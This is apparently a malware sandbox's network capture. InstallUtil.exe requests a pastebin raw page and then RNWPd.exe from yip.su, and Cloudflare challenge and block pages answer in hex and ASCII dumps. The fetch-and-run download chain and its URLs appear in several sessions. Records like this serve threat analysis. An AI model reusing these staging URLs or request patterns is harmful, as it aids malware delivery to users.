2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 37 30 34 39 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 66 35 31 62 31 66 63 33 33 63 27 2c 63 48 61 73 68 3a 20 27 36 31 37 34 32 33 35 36 31 30 62 38 63 65 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 68 52 34 73 73 30 4f 44 73 36 35 62 63 2e 34 72 4d 54 35 4f 33 36 79 67 37 65 44 61 61 37 59 54 30 54 7a 6d 48 67 38 5a 6a 58 73 2d 31 37 32 33 33 36 38 31 37 34 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '77049',cRay: '8b1729f51b1fc33c',cHash: '6174235610b8ce9',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=hR4ss0ODs65bc.4rMT5O36yg7eDaa7YT0TzmHg8ZjXs-1723368174-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:54 UTC	1369	IN	Data Raw: 4a 32 73 78 63 49 73 52 35 67 78 77 72 68 4c 35 6e 53 4f 43 48 71 72 54 57 5a 72 71 70 53 55 5f 36 57 47 4d 37 6b 6c 4b 31 30 52 38 6a 43 30 34 57 43 57 4e 6d 36 72 44 55 62 46 37 4c 71 49 5f 31 65 46 6f 72 64 35 35 6f 6c 71 68 57 5a 77 54 6d 51 59 68 47 5f 49 6a 58 74 76 6c 56 76 54 37 61 38 6d 63 73 55 65 79 69 70 33 78 6b 67 68 69 6e 4f 47 4d 6b 74 44 46 61 46 4a 61 6d 30 48 63 4f 6f 6e 65 71 72 46 79 5a 77 32 69 75 4d 39 6f 78 68 4d 4e 65 34 30 5a 54 46 57 51 71 56 65 72 55 54 32 6f 76 4c 70 75 75 6b 7a 44 57 33 44 30 41 76 54 75 71 4b 47 34 32 34 69 53 6d 55 37 77 32 73 43 48 77 53 51 61 45 44 31 72 42 76 70 52 73 47 53 78 53 78 41 72 64 59 30 68 63 45 61 4c 62 45 5f 31 6c 34 39 79 69 67 67 51 4e 47 62 52 47 50 38 51 72 45 70 64 52 38 4c 52 4b 51 6c Data Ascii: J2sxcIsR5gxwrhL5nSOCHqrTWZrqpSU_6WGM7klK10R8jC04WCWNm6rDUbF7LqI_1eFord55olqhWZwTmQYhG_IjXtvlVvT7a8mcsUeyip3xkghinOGMktDFaFJam0HcOoneqrFyZw2iuM9oxhMNe40ZTFWQqVerUT2ovLpuukzDW3D0AvTuqKG424iSmU7w2sCHwSQaED1rBvpRsGSxSxArdY0hcEaLbE_1l49yiggQNGbRGP8QrEpdR8LRKQl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49737	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:23:00 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:23:00 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:23:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b172a1669ea433a-EWR
2024-08-11 09:23:00 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:23:00 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:23:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49738	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:23:00 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:23:00 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:23:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:23:00 UTC	687	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 48 52 52 68 69 2f 2f 66 34 62 6d 55 51 39 6f 62 77 71 61 37 79 6a 55 69 73 7a 67 53 44 73 45 4a 38 4b 6b 7a 69 2b 45 41 74 68 4f 33 2f 57 4b 52 39 74 78 37 44 67 55 5a 4d 6d 50 31 59 4b 6e 5a 6f 53 30 37 46 49 58 42 6e 2b 56 38 38 62 55 2f 6c 4f 46 2b 4f 6d 70 64 53 68 62 4e 6f 66 63 6f 6a 6b 48 2f 4a 2f 67 41 45 6a 67 3d 24 38 51 62 7a 54 66 46 44 38 4b 59 57 61 32 4b 43 63 33 44 72 4f 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: HRRhi//f4bmUQ9obwqa7yjUiszgSDsEJ8Kkzi+EAthO3/WKR9tx7DgUZMmP1YKnZoS07FIXBn+V88bU/lOF+OmpdShbNofcojkH/J/gAEjg=$8QbzTfFD8KYWa2KCc3DrOQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 30 38 38 38 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 61 31 61 33 39 64 33 63 33 33 34 27 2c 63 48 61 73 68 3a 20 27 31 39 36 32 32 39 63 33 36 36 32 39 34 38 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 36 44 4a 46 38 4c 53 49 34 61 77 4a 49 4c 61 5a 42 31 4a 62 7a 34 39 4c 54 44 34 45 31 54 77 54 45 38 48 56 4c 6b 63 35 79 30 6b 2d 31 37 32 33 33 36 38 31 38 30 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '70888',cRay: '8b172a1a39d3c334',cHash: '196229c36629484',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=6DJF8LSI4awJILaZB1Jbz49LTD4E1TwTE8HVLkc5y0k-1723368180-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:23:00 UTC	1369	IN	Data Raw: 37 6b 77 34 2e 75 48 43 6c 4f 6a 77 39 6f 4b 64 4b 4d 30 5f 4c 43 31 36 34 61 34 72 78 77 35 31 79 53 30 38 77 5a 35 67 62 67 4e 4d 35 5f 6f 73 4c 59 38 42 38 46 48 7a 65 78 45 51 35 4c 59 61 43 37 5a 41 5a 55 75 47 38 31 73 78 4b 51 4e 39 6f 74 4d 47 66 38 77 6d 4d 77 6b 76 5f 79 35 63 63 72 73 4c 6e 52 69 71 37 4e 5f 56 6d 54 55 78 76 38 70 71 49 51 5a 4b 4c 50 31 62 6c 4d 5a 59 39 74 36 73 31 78 4c 44 59 54 65 4a 64 4d 33 75 53 41 7a 43 38 71 6c 4e 35 43 68 64 71 4f 53 77 79 48 33 5f 39 77 52 6d 41 59 5f 44 67 47 6c 35 71 69 39 6b 4b 33 75 38 56 76 6e 70 4b 49 43 76 44 50 6a 48 54 68 4f 69 75 75 41 47 2e 48 6a 61 46 32 43 74 4b 4c 44 59 6a 51 37 6a 7a 46 46 7a 45 4d 6f 70 4d 39 62 42 41 61 41 2e 7a 67 44 58 62 38 6f 30 58 72 46 70 7a 76 6a 62 35 47 74 Data Ascii: 7kw4.uHClOjw9oKdKM0_LC164a4rxw51yS08wZ5gbgNM5_osLY8B8FHzexEQ5LYaC7ZAZUuG81sxKQN9otMGf8wmMwkv_y5ccrsLnRiq7N_VmTUxv8pqIQZKLP1blMZY9t6s1xLDYTeJdM3uSAzC8qlN5ChdqOSwyH3_9wRmAY_DgGl5qi9kK3u8VvnpKICvDPjHThOiuuAG.HjaF2CtKLDYjQ7jzFFzEMopM9bBAaA.zgDXb8o0XrFpzvjb5Gt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49739	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:23:05 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:23:05 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:23:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b172a3a1f75c358-EWR
2024-08-11 09:23:05 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 